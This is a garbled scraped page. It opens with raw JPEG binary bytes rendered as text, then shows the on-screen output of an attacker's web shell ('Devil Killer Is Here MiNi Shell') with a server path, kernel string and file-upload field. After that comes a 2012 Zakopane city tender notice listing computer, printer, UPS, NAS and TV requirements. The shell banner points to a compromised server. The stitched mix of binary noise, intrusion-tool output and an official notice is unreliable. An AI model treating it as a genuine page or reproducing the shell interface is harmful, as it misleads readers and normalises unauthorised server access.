JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120601/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120601/121929-N-2012.html

<p class="kh_header"><b>Zakopane: BZP.271.61.2012  Przetarg nieograniczony na zakup i dostawę sprzętu i oprogramowania komputerowego  oraz   dwóch telewizorów  dla Urzędu Miasta Zakopane.</b><br>
<b>Numer ogłoszenia: 121929 - 2012; data zamieszczenia: 01.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BZP.271.61.2012  Przetarg nieograniczony na zakup i dostawę sprzętu i oprogramowania komputerowego  oraz   dwóch telewizorów  dla Urzędu Miasta Zakopane..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> III.	Przedmiotem zamówienia jest zakup i dostawa sprzętu i oprogramowania komputerowego  oraz dwóch telewizorów   dla Urzędu Miasta Zakopane 
   Zakres przedmiotu umowy obejmuje dostawę i serwis gwarancyjny, fabrycznie nowych:
1.Zestawy komputerowe bez monitorów - 15 szt. 
	Parametr	Minimalny parametr
1.Procesor	min. 64067  CTP in MTOPS (Million Theoretical Operations Per Second), technologia wykonania 32 nm, współczynniki na podstawie danych producentów. 
2.Pamięć RAM	min. 4 GB DDR 3
wolne złącza pamięci: min 2
3.Płyta główna	Częstotliwość pracy magistrali FSB- zgodna z oferowanym modelem procesora
Minimum 1 złącze PCI-EXPRESS x16
Kontroler HDD 2x SATAIII, HDD 4x SATAII
Obsługa RAID:0,1,5 (sprzętowy)
2 x USB 3.0 i 6 x USB 2.0
Zintegrowana karta sieciowa 10/100/1000
1 złącze równoległe (możliwość podłączenia starszych drukarek  LPT) 
4.HDD	dysk twardy o pojemności min. 500 GB , 16MB SATA III, 7200 obr./min
5. FDD	Opcjonalnie (niewymagane)
6.Napęd optyczny	Napęd optyczny DVD +/- RW Dual Layer, wewnętrzny SATA
7.Karta dźwiękowa	Zintegrowana
8.Karta graficzna	1024 MB DDR3 (128 bit) PCI Express x16, obsługiwane standardy: DirectX 11, HDCP,  OpenGL 3.2, low-profile,  wyjście DVI i  D-Sub
9.Obudowa i zasilacz	Obudowa stojąca Midi Tower, z wentylatorem wolnoobrotowym wyciągającym ciepłe powietrze z tyłu obudowy, wejście słuchawek i mikrofonu oraz 2 x USB 2.0 z przodu obudowy,  zasilacz : 400W - ATX 2.0; wentylatory: 1 x 120mm na łożysku ślizgowym,  AFC (automatyczna regulacja prędkości obrotowej wentylatorów),  PFC (współczynnik korekcji mocy aktywny),  zabezpieczenia/filtry: przeciwprzepięciowe, przeciwzwarciowe, termiczne. 
10.Klawiatura	Standard - zgodny z portami płyty głównej
Nie dopuszcza się stosowanie adapterów
11.Mysz	Optyczna, rolka,
Standard - zgodny z portami płyty głównej
Nie dopuszcza się stosowanie adapterów
12.Oprogramowanie	zainstalowany system operacyjny Windows 7 Professional  x86 (32 bit) PL lub równoważny, posiadający klucz licencyjny niezbędny do rejestracji i aktywacji usług, licencja użytkownika,  uprawniająca do legalnej instalacji systemu Windows wraz z nośnikiem CD/DVD
dołączone sterowniki dla systemu operacyjnego Windows 7 (na płycie CD lub DVD),
Microsoft Office 2010 PL - Professional   zawierający edytor tekstów, arkusz kalkulacyjny, program bazodanowy oraz program do przygotowywania prezentacji, klucz licencyjny niezbędny do rejestracji i aktywacji usług, licencja użytkownika (szczegółowa specyfikacja określająca  pakiet biurowy poniżej ),
oprogramowanie do nagrywania płyt zgodne z oferowaną nagrywarką (Nero lub równoważne),
oprogramowanie do odtwarzania DVD (Power DVD lub równoważne),
13.Konfiguracja wszystkie komputery muszą mieć identyczną konfigurację,
listwę zasilającą, przeciwprzepięciową, niezbędne kable potrzebne do podłączenia, dla każdego zestawu komputerowego,
wolnostojące głośniki stereo, podkładka pod myszkę,
2 partycje w tym partycja systemowa minimum 150 GB.
spójna kolorystyka zestawu (wszystkie elementy zewnętrzne w tym samym kolorze i odcieniu barwy)
14.Gwarancja	36 miesięcy od daty dostawy komputera w miejsce użytkowania, obejmująca transport od i do klienta, części i robociznę
Pakiet biurowy musi spełniać następujące wymagania:
1.	Wymagania odnośnie interfejsu użytkownika:
a.	Pełna polska wersja językowa interfejsu użytkownika 
b.	Prostota i intuicyjność obsługi, pozwalająca na pracę osobom nieposiadającym umiejętności technicznych
c.	Możliwość zintegrowania uwierzytelniania użytkowników z usługą katalogową (Active Directory lub funkcjonalnie równoważną) - użytkownik raz zalogowany z poziomu systemu operacyjnego stacji roboczej ma być automatycznie rozpoznawany we wszystkich modułach oferowanego rozwiązania bez potrzeby oddzielnego monitowania go o ponowne uwierzytelnienie się.
2.	Oprogramowanie musi umożliwiać tworzenie i edycję dokumentów elektronicznych w ustalonym formacie, który spełnia następujące warunki:
a.	posiada kompletny i publicznie dostępny opis formatu,
b.	ma zdefiniowany układ informacji w postaci XML zgodnie z Tabelą B1 załącznika 2 Rozporządzenia w sprawie minimalnych wymagań dla systemów teleinformatycznych  (Dz.U.05.212.1766)
c.	umożliwia wykorzystanie schematów XML
d.	wspiera w swojej specyfikacji podpis elektroniczny zgodnie z Tabelą A.1.1 załącznika 2 Rozporządzenia w sprawie minimalnych wymagań dla systemów teleinformatycznych  (Dz.U.05.212.1766)
3.	Oprogramowanie musi umożliwiać dostosowanie dokumentów i szablonów do potrzeb instytucji oraz udostępniać narzędzia umożliwiające dystrybucję odpowiednich szablonów do właściwych odbiorców. 
4.	W skład oprogramowania muszą wchodzić narzędzia programistyczne umożliwiające automatyzację pracy i wymianę danych pomiędzy dokumentami i aplikacjami (język makropoleceń, język skryptowy)
5.	Do aplikacji musi być dostępna pełna dokumentacja w języku polskim.
6.	Pakiet zintegrowanych aplikacji biurowych musi zawierać:
a.	Edytor tekstów 
b.	Arkusz kalkulacyjny 
c.	Narzędzie do przygotowywania i prowadzenia prezentacji
d.	Narzędzie do tworzenia drukowanych materiałów informacyjnych
e.	Narzędzie do zarządzania informacją prywatą (pocztą elektroniczną, kalendarzem, kontaktami i zadaniami)
f.	Narzędzie do tworzenia notatek przy pomocy klawiatury lub notatek odręcznych na ekranie urządzenia typu tablet PC z mechanizmem OCR. 
g.	Bazę danych
7.	Edytor tekstów musi umożliwiać:
a.	Edycję i formatowanie tekstu w języku polskim wraz z	obsługą języka polskiego w zakresie sprawdzania pisowni i poprawności gramatycznej oraz funkcjonalnością słownika wyrazów bliskoznacznych i autokorekty
b.	Wstawianie oraz formatowanie tabel 
c.	Wstawianie oraz formatowanie obiektów graficznych
d.	Wstawianie wykresów i tabel z arkusza kalkulacyjnego (wliczając tabele przestawne)
e.	Automatyczne numerowanie rozdziałów, punktów, akapitów, tabel i rysunków
f.	Automatyczne tworzenie spisów treści
g.	Formatowanie nagłówków i stopek stron
h.	Sprawdzanie pisowni w języku polskim
i.	Śledzenie zmian wprowadzonych przez użytkowników
j.	Nagrywanie, tworzenie i edycję makr automatyzujących wykonywanie czynności
k.	Określenie układu strony (pionowa/pozioma)
l.	Wydruk dokumentów
m.	Wykonywanie korespondencji seryjnej bazując na danych adresowych pochodzących z arkusza kalkulacyjnego i z narzędzia do zarządzania informacją prywatną
n.	Pracę na dokumentach utworzonych przy pomocy Microsoft Word 2003 lub Microsoft Word 2007 i 2010 z zapewnieniem bezproblemowej konwersji wszystkich elementów i atrybutów dokumentu
o.	Zabezpieczenie dokumentów hasłem przed odczytem oraz przed wprowadzaniem modyfikacji
p.	Wymagana jest dostępność do oferowanego edytora tekstu bezpłatnych narzędzi umożliwiających wykorzystanie go, jako środowiska udostępniającego formularze bazujące na schematach XML z Centralnego Repozytorium Wzorów Dokumentów Elektronicznych, które po wypełnieniu umożliwiają zapisanie pliku XML w zgodzie z obowiązującym prawem.
q.	Wymagana jest dostępność do oferowanego edytora tekstu bezpłatnych narzędzi (kontrolki) umożliwiających podpisanie podpisem elektronicznym pliku z zapisanym dokumentem przy pomocy certyfikatu kwalifikowanego zgodnie z wymaganiami obowiązującego w Polsce prawa.
r.	Wymagana jest dostępność do oferowanego edytora tekstu bezpłatnych narzędzi umożliwiających wykorzystanie go, jako środowiska udostępniającego formularze i pozwalające zapisać plik wynikowy w zgodzie z Rozporządzeniem o Aktach Normatywnych i Prawnych.
8.	Arkusz kalkulacyjny musi umożliwiać:
a.	Tworzenie raportów tabelarycznych
b.	Tworzenie wykresów liniowych (wraz linią trendu), słupkowych, kołowych
c.	Tworzenie arkuszy kalkulacyjnych zawierających teksty, dane liczbowe oraz formuły przeprowadzające operacje matematyczne, logiczne, tekstowe, statystyczne oraz operacje na danych finansowych i na miarach czasu.
d.	Tworzenie raportów z zewnętrznych źródeł danych (inne arkusze kalkulacyjne, bazy danych zgodne z ODBC, pliki tekstowe, pliki XML, webservice)
e.	Obsługę kostek OLAP oraz tworzenie i edycję kwerend bazodanowych i webowych. Narzędzia wspomagające analizę statystyczną i finansową, analizę wariantową i rozwiązywanie problemów optymalizacyjnych
f.	Tworzenie raportów tabeli przestawnych umożliwiających dynamiczną zmianę wymiarów oraz wykresów bazujących na danych z tabeli przestawnych
g.	Wyszukiwanie i zamianę danych
h.	Wykonywanie analiz danych przy użyciu formatowania warunkowego
i.	Nazywanie komórek arkusza i odwoływanie się w formułach po takiej nazwie
j.	Nagrywanie, tworzenie i edycję makr automatyzujących wykonywanie czynności
k.	Formatowanie czasu, daty i wartości finansowych z polskim formatem
l.	Zapis wielu arkuszy kalkulacyjnych w jednym pliku.
m.	Zachowanie pełnej zgodności z formatami plików utworzonych za pomocą oprogramowania Microsoft Excel 2003 oraz Microsoft Excel 2007 i 2010, z uwzględnieniem poprawnej realizacji użytych w nich funkcji specjalnych i makropoleceń
n.	Zabezpieczenie dokumentów hasłem przed odczytem oraz przed wprowadzaniem modyfikacji
9.	Narzędzie do przygotowywania i prowadzenia prezentacji musi umożliwiać:
a.	Przygotowywanie prezentacji multimedialnych, które będą:
b.	Prezentowanie przy użyciu projektora multimedialnego
c.	Drukowanie w formacie umożliwiającym robienie notatek
d.	Zapisanie jako prezentacja tylko do odczytu.
e.	Nagrywanie narracji i dołączanie jej do prezentacji
f.	Opatrywanie slajdów notatkami dla prezentera
g.	Umieszczanie i formatowanie tekstów, obiektów graficznych, tabel, nagrań dźwiękowych i wideo
h.	Umieszczanie tabel i wykresów pochodzących z arkusza kalkulacyjnego
i.	Odświeżenie wykresu znajdującego się w prezentacji po zmianie danych w źródłowym arkuszu kalkulacyjnym
j.	Możliwość tworzenia animacji obiektów i całych slajdów
k.	Prowadzenie prezentacji w trybie prezentera, gdzie slajdy są widoczne na jednym monitorze lub projektorze, a na drugim widoczne są slajdy i notatki prezentera
l.	Pełna zgodność z formatami plików utworzonych za pomocą oprogramowania MS PowerPoint 2003, MS PowerPoint 2007 i 2010.
10.	Narzędzie do tworzenia drukowanych materiałów informacyjnych musi umożliwiać:
a.	Tworzenie i edycję drukowanych materiałów informacyjnych
b.	Tworzenie materiałów przy użyciu dostępnych z narzędziem szablonów: broszur, biuletynów, katalogów.
c.	Edycję poszczególnych stron materiałów.
d.	Podział treści na kolumny.
e.	Umieszczanie elementów graficznych.
f.	wykorzystanie mechanizmu korespondencji seryjnej
g.	Płynne przesuwanie elementów po całej stronie publikacji.
h.	Eksport publikacji do formatu PDF oraz TIFF.
i.	Wydruk publikacji.
j.	Możliwość przygotowywania materiałów do wydruku w standardzie CMYK.
11.	Narzędzie do zarządzania informacją prywatną (pocztą elektroniczną, kalendarzem, kontaktami i zadaniami) musi umożliwiać:
a.	Pobieranie i wysyłanie poczty elektronicznej z serwera pocztowego 
b.	Filtrowanie niechcianej poczty elektronicznej (SPAM) oraz określanie listy zablokowanych i bezpiecznych nadawców
c.	Tworzenie katalogów, pozwalających katalogować pocztę elektroniczną
d.	Automatyczne grupowanie poczty o tym samym tytule
e.	Tworzenie reguł przenoszących automatycznie nową pocztę elektroniczną do określonych katalogów bazując na słowach zawartych w tytule, adresie nadawcy i odbiorcy
f.	Oflagowanie poczty elektronicznej z określeniem terminu przypomnienia
g.	Zarządzanie kalendarzem
h.	Udostępnianie kalendarza innym użytkownikom
i.	Przeglądanie kalendarza innych użytkowników
j.	Zapraszanie uczestników na spotkanie, co po ich akceptacji powoduje automatyczne wprowadzenie spotkania w ich kalendarzach
k.	Zarządzanie listą zadań
l.	Zlecanie zadań innym użytkownikom
m.	Zarządzanie listą kontaktów
n.	Udostępnianie listy kontaktów innym użytkownikom
o.	Przeglądanie listy kontaktów innych użytkowników
p.	Możliwość przesyłania kontaktów innym użytkowników
12.	Baza danych musi umożliwiać:
a.	Tworzenie tabel z pól zawierających typy danych: tekstowe, liczbowe, obiekty OLE i hiperłącza
b.	Tworzenie kwerend w postaci tabelaryczne i sqlowej
c.	Tworzenie formularzy do wprowadzania danych zawierających Formanty ActivX i podformularze
d.	Tworzenie raportów z możliwością exportu do XML, PDF i TXT
e.	Tworzenie relacji pomiędzy tabelami i kwerendami w graficzny sposób
f.	Wielodostęp z uwzględnieniem uprawnień użytkowników
g.	Zachowanie pełna zgodność z plikiem informacyjnym grup roboczych (MDW)
h.	Zachowanie pełnej zgodności z formatami plików utworzonych za pomocą oprogramowania Microsoft Access 2003 oraz Microsoft Access 2007 i 2010, z uwzględnieniem poprawnej realizacji zapisanych w nich formularzy, raportów, makropoleceń i kodu VBasic

2.	 Zakup  monitorów - 8  szt. 
Parametry:
Przekątna:	Min. 20 cali, podświetlanie  led
Rozdzielczość nominalna:	1680 x 1050 piksele
Normy jakościowe:	Spełniane normy jakościowe Energy Star
Cyfrowe złącze DVI	Tak 
Zgodność z technologią HDCP	Tak 
Gwarancja	36 miesięcy
Kąt widzenia - pion	160 stopni
Kąt widzenia - poziom	170 stopni
dodatkowe	Gwarancja 36 miesięcy od daty dostawy  w miejsce użytkowania
Kabel DVI w zestawie
Okres gwarancji monitorów 36 miesięcy.

3.	 Drukarki Laserowe monochromatyczne A4 - 5 szt. 
	Parametr	Minimalny parametr
1.		Prędkość druku w czerni 	Min. 32 str./min
2.		Technologia druku	Druk laserowy
3.		Jakość druku	1200x1200 dpi
4.		Standardowa pamięć	128 MB
5.		Szybkość procesora	600 MHz
6.		Standardowe języki drukarki	PCL 5, PCL 6, emulacja Postscript 3
7.		Druk dwustronny	TAK, Automatyczny  - wbudowany duplex
8.		Standardowe rozwiązania komunikacyjne	Hi-Speed USB 2.0, Interfejs sieci przewodowej Ethernet 10/100,
9.		Certyfikat ENERGY STAR	Posiadający certyfikat ENERGY STAR
10.		Normatywny cykl pracy (miesięcznie, format A4)	Do 50000 stron
11.		Obsługiwane systemy operacyjne	Microsoft Windows  XP Professional, Server 2003; Windows Vista; Windows 7
12.		Gwarancja	36 miesięcy od daty dostawy drukarki w miejsce użytkowania. 


4.	Komputery przenośne (Laptopy) 15,6 - 3 szt. 
	Parametr	Minimalny parametr
1.	Procesor	min. 49600  CTP in MTOPS (Million Theoretical Operations Per Second ), technologia wykonania 32 nm, współczynniki na podstawie danych producentów. 
2.	Pamięć RAM	4096 MB (SODIMM DDRAM3, 1333 MHz, maks. 8 GB)
3.	Rodzaje wyjść / wejść	1x Bluetooth 3.0
1x Combo eSATA/USB 2.0
1x czytnik kart pamięci 8 w 1
1x DC-in (wejście zasilania)
1x ExpressCard 34
1x HDMI
1x RJ-45
1x USB 2.0
1x VGA
1x wejście mikrofonowe
1x wyjście słuchawkowe/głośnikowe
2x USB 3.0
4.	HDD	dysk twardy o pojemności min. 500 GB , SATA  7200 obr./min
5.	 Typ ekranu	TFT WXGA HD LED z powłoką antyodblaskową 
6.	Napęd optyczny	DVD+/-RW DualLayer
7.	Karta dźwiękowa	Zintegrowana
8.	Karta graficzna	1024 MB DDR3 (128 bit) ,obsługiwane standardy: DirectX 11, Shader 5.0, OpenGL 4.1
9.	Karta sieciowa	1 x 10/100/1000 Mbps
1 x Wi-Fi 802.11 b/g/n
10.	Oprogramowanie	zainstalowany system operacyjny Windows 7 Professional  (64 bit) PL lub równoważny, posiadający klucz licencyjny niezbędny do rejestracji i aktywacji usług, licencja użytkownika,  uprawniająca do legalnej instalacji systemu Windows wraz z nośnikiem CD/DVD
dołączone sterowniki dla systemu operacyjnego Windows 7 (na płycie CD lub DVD),
Microsoft Office 2010 PL - Professional   zawierający edytor tekstów, arkusz kalkulacyjny, program bazodanowy access oraz program do przygotowywania prezentacji, klucz licencyjny niezbędny do rejestracji i aktywacji usług, licencja użytkownika,
oprogramowanie do nagrywania płyt zgodne z oferowaną nagrywarką (Nero lub równoważne),
oprogramowanie do odtwarzania DVD (Power DVD lub równoważne),
11.	Dodatkowe Informacje	36 - miesięcy gwarancji Next business Day od daty dostawy w miejsce użytkowania
Klawiatura odporna na zalanie
Wbudowana kamera internetowa 2.0 MP
Wbudowane głośniki
Wbudowany mikrofon
Zasilacz w zestawie
Torba do bezpiecznego przenoszenia laptopa

5.Zasilacz awaryjny (UPS): APC SMART-UPS RT 5000VA 230V DSP SURTD5000XLI  lub równoważny- 1 sztuka 
Specyfikacja techniczna

 Na wyjściu
-Moc wyjściowa :3500W / 5000 VA 
-Maksymalna moc, jaką można skonfigurować :3500W / 5000 VA 
-Napięcie wyjściowe :230V 
-Informacja o napięciu wyjściowym :Configurable for 220 : 230 or 240 nominal output voltage 
-Wydajność przy pełnym obciążeniu :92.00 procent 
-Zniekształcenia napięcia wyjściowego :Less than 3 procent
-Częstotliwość na wyjściu (synchronicznie z siecią) :50/60 Hz +/- 3 Hz user adjustable +/- 0.1 
-Współczynnik szczytu :3 : 1 
-Typ przebiegu :Sine wave 
-Gniazda wyjściowe :(8) IEC 320 C13, (2) IEC 320 C19, (6) IEC Jumpers
Na wejściu
-Układ obejściowy (bypass): Internal Bypass (Automatic and Manual) 
-Nominalne napięcie wejściowe: 230V 
-Częstotliwość na wejściu: 50/60 Hz +/- 5 Hz (auto sensing) 
-Typ gniazda wejściowego Hard Wire 3-wire: 
-Zakres napięcia wejściowegow trybie podstawowym :160 - 280V 
-Zmienny zakres napięcia wejściowego w trybie podstawowym :100 - 280V 
-Inne napięcia wejściowe :220,240 
Akumulatory i czas podtrzymania
-Typ akumulatora :Bezobsługowe baterie ołowiowo-kwasowe 
-Wstępnie zainstalowane baterie :2 
-Typowy czas pełnego ładowania akumulatora :2.50 godziny 
-Zestaw akumulatorów zamiennych :RBC44 
-Ilość zestawów RBC :1 
-Typowy czas podtrzymaniaprzy obciążeniu 50% :15.4 minuty (1750 W) 
-Typowy czas podtrzymania przy pełnym obciążeniu :5.0 minuty (3500 W) 
-Tabela czasów podtrzymania : Smart-UPS RT 
-Opcje przedłużonego podtrzymania zasilania dla APC Smart-UPS RT 5000VA 230V
Komunikacja i zarządzanie
-Port komunikacyjny :DB-9 RS-232,RJ-45 10/100 Base-T,SmartSlot 
-Wstęnie zainstalowane karty SmartSlot:AP9619 
-Panel przedni :Diody LED wsakzują pracę z sieci : pracę z baterii : stan wymiany baterii : stanu przeciążenia oraz pracy w trybie Bypass 
-Alarm dźwiękowy :Alarm podczas pracy na baterii: znaczny stan wyczerpania baterii : ciągły sygnał dźwiękowy w stanie przeciążenia 
-Awaryjny wyłącznik zasilania :Tak 
Ochrona przed przepięciami i filtracja
-Znamionowa energia przepięcia (w dżulach) :480 Dżule 
-Filtracja :Full time multi-pole noise filtering : 0.3 procent IEEE surge let-through : zero clamping response time : meets UL 1449

6.	 Dysk sieciowy (Serwer plików NAS) - QNAP TS-419P II  lub równoważny - 1 sztuka
Specyfikacja techniczna:
Typ	Zewnętrzna 
Interfejs wewnętrzny	Serial ATA II 
Interfejs zewnętrzny	RJ-45 
	
Procesor	Marvell 2 GHz
Pamięć	Min. 512 MB
Ilość dysków	4 x 3,5 cala SATA II HDD lub 2 x 2,5 cala SATA II do 3TB każdy - szuflady z funkcją hot-swap z bezpośrednim dostępem
Sieć	Ethernet 10/100/1000 Mbit, 2 x RJ-45 
	4 x USB, 2 x eSATA, 2 x RJ-45 
Wskaźniki LED	zasilanie, LAN, eSATA, HDD, Status, USB 
	
Wyświetlacz LED	podgląd parametrów systemu
Obsługa trybów RAID	RAID 6, RAID 5, RAID 5+spara, RAID 1, RAID 0, JBOD, Single Disk 
Funkcje RAID	Rozbudowa i zmiana trybu RAID /on-line/ bez restaru urządzenia
Przyciski	zasilanie, reset, auto kopiowanie 
		
Złącza dodatkowe	Windows, Linux, Unix 
Protokoły sieciowe	CIFS, AFP, NFS, HTTP, FTP, HTTPS, NTP, SNMP, Telnet, SSH 
Konfiguracja sieci	TCP / IP, stały lub dynamiczny adres 
Multi IP	tak - możliwe oddzielne adresy IP na każdym porcie sieciowym 
Port trunking	tak - balance, active backup, balance XOR, broadcast, IEE 802,3ad 
Serwer DHCP, dynamiczny DNS	Tak 
	
Windows Active Directory	Tak 
Zarządzanie dyskami	skanowanie złych sektorów, SMART,
	
Bezpieczeństwo sieci	filtr IP, FTP over SSL, tryb pasywny
Inne usługi	iSCSI target, Virtual Disk, kosz sieciowy, monitor zasobów on-line, harmonogram wł/wył
Logi systemowe	użytkownicy, alarmy, błędy, połączenia do plików, przydziały DHCP
Język interfejsu	Polski

7.	Dyski twarde HDD SATA  o pojemności  2 TB - 6 szt
1.	Format szerokość	3,5 cala
2.	typ	magnetyczny
3.	Pojemność	2000 MB
4.	interfejs	Serial ATA
5.	Wersja interfejsu	Serial ATA/600
6.	Prędkość obrotowa	5900 obr./min.
7.	Pamięć cache	64 MB
8.	Technologia NCQ	tak
9.	Technologia S.M.A.R.T.	tak
10.	Gwarancja	36 miesięcy

8.	Drukarki atramentowe kolorowe A3 - 2 szt. 
	Parametr	Minimalny parametr
1.	Prędkość druku w czerni 	 33 str./min
2.	Prędkość druku w kolorze	32 str./min
3.	Maksymalny format nośnika	A3
4.	Technologia druku	atramentowa
5.	Rozdzielczość wydruku mono/kolor	4800x1200
6.	Obsługiwane systemy operacyjne	Microsoft Windows  XP Professional, Server 2003; Windows Vista; Windows 7(x86,x64)
7.	Standardowe rozwiązania komunikacyjne	USB 2.0, Interfejs sieci przewodowej Ethernet 10/100
8.	Certyfikat ENERGY STAR	Posiadający certyfikat ENERGY STAR
9.	Gwarancja	36 miesięcy od daty dostawy drukarki w miejsce użytkowania.


9.	 Telewizory LED - 47 cali - 2szt. 

1.	Przekątna (cale) 	 min. 47
2.	 Pobór mocy 	 poniżej 100 W
3.	Proporcje obrazu 	16:9  
4.	Kontrast  	5000000:1
5.	Rozdzielczość  	1920x1080 (Full HD)
6.	Czas reakcji 	poniżej 3 ms
7.	Ilość gniazd HDMI 	min. 3
8.	Częstotliwość 	600 Hz
9.	Wbudowany tuner 	DVB-T (MPEG4), DVB-C, DVB-S
10.	Smart TV 	tak
11.	Obsługa sieci Wi-fi 	tak (dopuszczone z urządzeniem zewnętrznym USB)
12.	Pilot 	tak
13.	Uchwyt ścienny	tak (uchylno - obrotowy)
14.	Gwarancja	Min. 24 m-ce


Wyżej wymieniony sprzęt musi być fabrycznie nowy.
W ofercie należy wyszczególnić nazwę, rodzaj podzespołu, podać producenta oraz istotne elementy, które maja wpływ na cenę.
